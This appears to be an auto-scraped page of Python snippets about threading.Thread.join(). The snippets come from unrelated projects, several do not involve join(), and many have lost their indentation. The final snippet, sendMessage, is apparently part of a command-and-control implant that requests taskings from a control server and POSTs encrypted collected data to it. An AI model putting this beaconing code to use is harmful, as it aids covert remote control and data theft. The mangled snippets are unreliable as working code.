Python threading.Thread module: join() example source code
We extracted the following 44 code examples from open-source Python projects to illustrate how threading.Thread.join() is used.
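As a baseline: join() blocks the calling thread until the target thread terminates (or until the optional timeout elapses). A minimal self-contained sketch, with illustrative names not taken from any of the projects below:

import threading
import time

def worker(n):
    time.sleep(0.1)  # simulate some work so join() actually has to wait
    print("worker %d done" % n)

threads = [threading.Thread(target=worker, args=(i,)) for i in range(3)]
for t in threads:
    t.start()
for t in threads:
    t.join()  # returns once the corresponding worker has finished
print("all workers joined")

Many of the snippets below override join() in a Thread subclass so that it also hands a result (a value, collected objects, or exception info) back to the caller.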
def get_pid_location(module):
"""
Try to find a pid directory in the common locations, falling
back to the user's home directory if no others exist
"""
    for dirname in ['/var/run', '/var/lib/run', '/run', os.path.expanduser("~/")]:
        try:
            if os.path.isdir(dirname) and os.access(dirname, os.R_OK | os.W_OK):
                return os.path.join(dirname, '.accelerate.pid')
        except Exception:
            pass
module.fail_json(msg="couldn't find any valid directory to use for the accelerate pid file")
# NOTE: this shares a fair amount of code with async_wrapper; if async_wrapper were a new module, we could move
# this into utils.module_common, and probably should anyway
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
    # check whether that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
    # Error out if we can't find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def testMTRandomness(self):
q = queue.Queue()
def proc():
rng = tar.gen_rng()
with tar.with_rng(rng):
time.sleep(0.5)
state = tar.get_rng().get_state()
time.sleep(0.5)
q.put(state)
threads = [Thread(target=proc) for i in range(2)]
map_exec(Thread.start, threads)
map_exec(Thread.join, threads)
v1, v2 = q.get(), q.get()
self.assertFalse(np.allclose(v1[1], v2[1]))
def join(self):
Thread.join(self)
return self.select_objects
def is_join(self, historic, table_src, table_trg):
    # Recursively search the join graph for a path of joins leading from
    # table_src to table_trg, skipping tables already visited (historic).
    links = self.get_all_direct_linked_tables_of_a_table(table_src)
differences = []
for join in links:
if join[0][0] not in historic:
differences.append(join)
links = differences
for join in links:
if join[1][0] == table_trg:
return [0, join]
path = []
historic.append(table_src)
for join in links:
result = [1, self.is_join(historic, join[1][0], table_trg)]
if result[1] != []:
if result[0] == 0:
path.append(result[1])
path.append(join)
else:
path = result[1]
path.append(join)
return path
def join(self):
Thread.join(self)
return self.where_objects
def join(self):
Thread.join(self)
return self.order_by_objects
def remove_accents(self, string):
nkfd_form = unicodedata.normalize('NFKD', str(string))
return "".join([c for c in nkfd_form if not unicodedata.combining(c)])
def join(self, timeout=None):
try:
self.queue.task_done()
    except ValueError:
        pass  # Nothing waiting in queue, how nice!
self.queue.put(None)
Thread.join(self, timeout)
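The None put into the queue above acts as a shutdown sentinel: join() first balances a possibly outstanding task_done(), posts the sentinel, and only then waits for the thread. A minimal sketch of the consumer side this implies (the class shape is assumed, since run() is not part of the excerpt):

import queue
from threading import Thread

class QueueWorker(Thread):
    def __init__(self):
        Thread.__init__(self)
        self.queue = queue.Queue()

    def run(self):
        while True:
            item = self.queue.get()
            if item is None:  # sentinel posted by join(); exit the loop
                break
            # ... process item ...
            self.queue.task_done()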
def qout_join(self):
for q in self.queue_out:
q.join()
def join(self, timeout=0):
"""??????"""
self._event.set()
Thread.join(self, timeout)
def stop(timeout=None):
"""???????????????"""
for thread in FThread._fthreads:
thread.join(timeout)
def join(self, timeout=None):
Thread.join(self, timeout=timeout)
return self._return
def join(self, timeout):
""" Join method
:param timeout: thread timeout
:return: thread method return value
"""
Thread.join(self, timeout)
return self.return_value
def join(self, timeout=None):
"""Stops the thread"""
self._stopevent.set()
Thread.join(self, timeout)
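This join() override cooperates with a run() loop that polls the stop event; a minimal sketch of the counterpart loop (assumed here, since run() is not shown in the excerpt):

from threading import Thread, Event

class StoppableThread(Thread):
    def __init__(self):
        Thread.__init__(self)
        self._stopevent = Event()

    def run(self):
        while not self._stopevent.is_set():
            # ... do one unit of work ...
            # wait() doubles as an interruptible sleep: it returns early
            # as soon as join() sets the event
            self._stopevent.wait(0.5)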
#--------------------------------------------------------------------#
def join(self):
Thread.join(self)
return self.exc_info
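Returning self.exc_info from join() lets the parent thread inspect or rethrow an exception raised inside the child; a minimal sketch of the wrapper class this pattern implies (assumed shape; the extra constructor argument that WrappedThread takes in dwr_handler further below is omitted):

import sys
from threading import Thread

class ExcInfoThread(Thread):
    def run(self):
        self.exc_info = None
        try:
            Thread.run(self)  # runs target(*args, **kwargs)
        except Exception:
            self.exc_info = sys.exc_info()

    def join(self):
        Thread.join(self)
        return self.exc_info  # None if the target finished cleanly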
def get_JSON_response(url="", cache_days=7.0, headers=False):
now = time.time()
hashed_url = hashlib.md5(url).hexdigest()
cache_path = xbmc.translatePath(os.path.join(ADDON_DATA_PATH, 'cache'))
path = os.path.join(cache_path, hashed_url + ".txt")
cache_seconds = int(cache_days * 86400.0)
prop_time = HOME.getProperty(hashed_url + "_timestamp")
if prop_time and now - float(prop_time) < cache_seconds:
try:
prop = json.loads(HOME.getProperty(hashed_url))
logger.info("streamondemand.channels.database prop load for %s. time: %f" % (url, time.time() - now))
return prop
        except Exception:
logger.info("could not load prop data for %s" % url)
if xbmcvfs.exists(path) and ((now - os.path.getmtime(path)) < cache_seconds):
results = read_from_file(path)
logger.info("streamondemand.channels.database loaded file for %s. time: %f" % (url, time.time() - now))
else:
response = get_http(url, headers)
try:
results = json.loads(response)
logger.info("streamondemand.channels.database download %s. time: %f" % (url, time.time() - now))
save_to_file(results, hashed_url, cache_path)
        except Exception:
            logger.info("streamondemand.channels.database Exception: Could not get new JSON data from %s. Trying to fall back to cache" % url)
if xbmcvfs.exists(path):
results = read_from_file(path)
else:
results = []
HOME.setProperty(hashed_url + "_timestamp", str(now))
HOME.setProperty(hashed_url, json.dumps(results))
return results
def save_to_file(content, filename, path=""):
if path == "":
return False
if not xbmcvfs.exists(path):
xbmcvfs.mkdirs(path)
text_file_path = os.path.join(path, filename + ".txt")
now = time.time()
text_file = xbmcvfs.File(text_file_path, "w")
json.dump(content, text_file)
text_file.close()
logger.info("saved textfile %s. Time: %f" % (text_file_path, time.time() - now))
return True
def logInfo(*args):
logging.getLogger(LOG_LOGGER).info(" - ".join(args))
###################################################################################
def logWarning(*args):
logging.getLogger(LOG_LOGGER).warning(" - ".join(args))
###################################################################################
def logDebug(*args):
if CONFIG["debug"]:
logging.getLogger(LOG_LOGGER).debug(" - ".join(args))
###################################################################################
def join(self, timeout=None):
Thread.join(self, timeout)
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
        raise IOError('Path %r does not start with module name %r' % (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n'+padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
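The Stack Overflow pattern referenced above subclasses Thread so that run() captures the target's return value and join() hands it back to the caller; a minimal Python 3 sketch (Thread stores the constructor arguments as self._target, self._args and self._kwargs):

from threading import Thread

class ThreadWithReturn(Thread):
    def run(self):
        self._return = None
        if self._target is not None:
            self._return = self._target(*self._args, **self._kwargs)

    def join(self, timeout=None):
        Thread.join(self, timeout=timeout)
        return self._return

# usage: t = ThreadWithReturn(target=pow, args=(2, 10)); t.start(); t.join() -> 1024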
def testFakeMTRandomness(self):
mutex = threading.Lock()
@contextlib.contextmanager
def fake_with_rng(rrr):
from tartist.random import rng
with mutex:
backup = rng._rng
rng._rng = rrr
yield rrr
with mutex:
rng._rng = backup
q = queue.Queue()
def proc():
rng = tar.gen_rng()
with fake_with_rng(rng):
time.sleep(0.5)
state = tar.get_rng().get_state()
time.sleep(0.5)
q.put(state)
threads = [Thread(target=proc) for i in range(2)]
map_exec(Thread.start, threads)
map_exec(Thread.join, threads)
v1, v2 = q.get(), q.get()
    self.assertTrue(np.allclose(v1[1], v2[1]))
def dwr_handler(fuzzed, f):
(own_plug, fuzzed_plug) = sk.socketpair(sk.AF_UNIX, sk.SOCK_SEQPACKET)
child = WrappedThread(fuzzed_plug, target=fuzzed, args=[fuzzed_plug])
child.start()
while True:
(readable, _, _) = sl.select([own_plug, f], [], [])
if own_plug in readable:
try:
b = own_plug.recv(dm.U24_MAX)
if len(b) == 0:
break
            except Exception:
                break
f.send(b)
elif f in readable:
b = f.recv(dm.U24_MAX)
if len(b) == 0:
break
m = dm.Msg.decode(b)
if m.code == 280 and m.R:
dwa = dm.Msg(code=280, R=False, e2e_id=m.e2e_id, h2h_id=m.h2h_id, avps=[
dm.Avp(code=264, M=True, data=local_host),
dm.Avp(code=296, M=True, data=local_realm),
dm.Avp(code=268, M=True, u32=2001),
dm.Avp(code=278, M=True, u32=0xcafebabe)])
f.send(dwa.encode())
else:
own_plug.send(b)
own_plug.close()
return child.join()
def get_path(a, codes):
attrs = {}
attrs['code'] = a.code
if a.vendor != 0:
attrs['vendor'] = a.vendor
path = ','.join(['%s=%d' % (x, attrs[x]) for x in attrs])
key = (a.code, a.vendor)
if len(codes[key]) != 1:
path += '[%d]' % (codes[key].index(a))
return path
def dwr_handler(scenario, f):
msgs = []
(own_plug, fuzzed_plug) = sk.socketpair(sk.AF_UNIX, sk.SOCK_SEQPACKET)
    # WrappedThread's join() returns the child's exc_info; plain Thread.join() would return None
    child = WrappedThread(fuzzed_plug, target=scenario, args=[fuzzed_plug])
child.start()
while True:
(readable, _, _) = sl.select([own_plug, f], [], [])
if own_plug in readable:
b = own_plug.recv(dm.U24_MAX)
if len(b) == 0:
break
m = dm.Msg.decode(b)
msgs.append((m, True))
f.send(b)
elif f in readable:
b = f.recv(dm.U24_MAX)
if len(b) == 0:
break
m = dm.Msg.decode(b)
if m.code == 280 and m.R:
dwa = dm.Msg(code=280, R=False, e2e_id=m.e2e_id, h2h_id=m.h2h_id, avps=[
dm.Avp(code=264, M=True, data=local_host),
dm.Avp(code=296, M=True, data=local_realm),
dm.Avp(code=268, M=True, u32=2001),
dm.Avp(code=278, M=True, u32=0xcafebabe)])
f.send(dwa.encode())
else:
msgs.append((m, False))
own_plug.send(b)
own_plug.close()
exc_info = child.join()
return (exc_info, msgs)
def run(self):
for table_of_from in self.tables_of_from: # for each query
self.select_object = Select()
is_count = False
self.columns_of_select = self.uniquify(self.columns_of_select)
number_of_select_column = len(self.columns_of_select)
if number_of_select_column == 0:
select_type = []
for count_keyword in self.count_keywords:
                # if count_keyword in (word.lower() for word in self.phrase):
                # match against the joined phrase so that multi-word keyword synonyms from the
                # .lang file are detected too for COUNT, not just single words
                # (e.g. QUERY -> "how many city there are in which the employe name is aman ?")
lower_self_phrase = ' '.join(word.lower() for word in self.phrase)
if count_keyword in lower_self_phrase:
select_type.append('COUNT')
self.select_object.add_column(None, self.uniquify(select_type))
else:
select_phrases = []
previous_index = 0
for i in range(0, len(self.phrase)):
for column_name in self.columns_of_select:
if (self.phrase[i] == column_name) or (
self.phrase[i] in self.database_object.get_column_with_this_name(column_name).equivalences):
select_phrases.append(self.phrase[previous_index:i + 1])
previous_index = i + 1
select_phrases.append(self.phrase[previous_index:])
for i in range(0, len(select_phrases)): # for each select phrase (i.e. column processing)
select_type = []
phrase = [word.lower() for word in select_phrases[i]]
for keyword in self.average_keywords:
if keyword in phrase:
select_type.append('AVG')
for keyword in self.count_keywords:
if keyword in phrase:
select_type.append('COUNT')
for keyword in self.max_keywords:
if keyword in phrase:
select_type.append('MAX')
for keyword in self.min_keywords:
if keyword in phrase:
select_type.append('MIN')
for keyword in self.sum_keywords:
if keyword in phrase:
select_type.append('SUM')
for keyword in self.distinct_keywords:
if keyword in phrase:
select_type.append('DISTINCT')
if (i != len(select_phrases) - 1):
column = self.get_column_name_with_alias_table(self.columns_of_select[i], table_of_from)
self.select_object.add_column(column, self.uniquify(select_type))
self.select_objects.append(self.select_object)
def build_movie_list(item, movies):
if movies is None: return []
itemlist = []
for movie in movies:
title = normalize_unicode(tmdb_tag(movie, 'title'))
title_search = normalize_unicode(tmdb_tag(movie, 'title'), encoding='ascii')
poster = tmdb_image(movie, 'poster_path')
fanart = tmdb_image(movie, 'backdrop_path', 'w1280')
jobrole = normalize_unicode(' [COLOR azure][' + tmdb_tag(movie, 'job') + '][/COLOR]' if tmdb_tag_exists(movie, 'job') else '')
genres = ' / '.join([tmdb_genre(genre).upper() for genre in tmdb_tag(movie, 'genre_ids', [])])
year = tmdb_tag(movie, 'release_date')[0:4] if tmdb_tag_exists(movie, 'release_date') else ''
plot = "[COLOR orange]%s%s[/COLOR]\n%s"%(genres, '\n' + year, tmdb_tag(movie, 'overview'))
plot = normalize_unicode(plot)
found = False
kodi_db_movies = kodi_database_movies(title)
for kodi_db_movie in kodi_db_movies:
logger.info('streamondemand.database set for local playing(%s):\n%s' % (title, str(kodi_db_movie)))
if year == str(kodi_db_movie["year"]):
found = True
itemlist.append(Item(
channel=item.channel,
action='play',
url=kodi_db_movie["file"],
title='[COLOR orange][%s][/COLOR] ' % NLS_Library + kodi_db_movie["title"] + jobrole,
thumbnail=kodi_db_movie["art"]["poster"],
category=genres,
plot=plot,
viewmode='movie_with_plot',
fanart=kodi_db_movie["art"]["fanart"],
folder=False,
))
if not found:
logger.info('streamondemand.database set for channels search(%s)' % title)
itemlist.append(Item(
channel=item.channel,
action='do_channels_search',
extra=("%4s" % year) + title_search,
title=title + jobrole,
thumbnail=poster,
category=genres,
plot=plot,
viewmode='movie_with_plot',
fanart=fanart,
))
return itemlist
def sendMessage(packets=None):
"""
Requests a tasking or posts data to a randomized tasking URI.
If packets == None, the agent GETs a tasking from the control server.
If packets != None, the agent encrypts the passed packets and
POSTs the data to the control server.
"""
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = "".join(packets)
data = aes_encrypt_then_hmac(key, data)
taskURI = random.sample(taskURIs, 1)[0]
if (server.endswith(".php")):
# if we have a redirector host already
requestUri = server
else:
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ("200", data)
    except urllib2.HTTPError as e:
        # if the server is reached, but returns an error (like 404)
        missedCheckins = missedCheckins + 1
        return (e.code, "")
    except urllib2.URLError as e:
        # if the server cannot be reached
        missedCheckins = missedCheckins + 1
        return (e.reason, "")
return ("","")
################################################
#
# encryption methods
#
################################################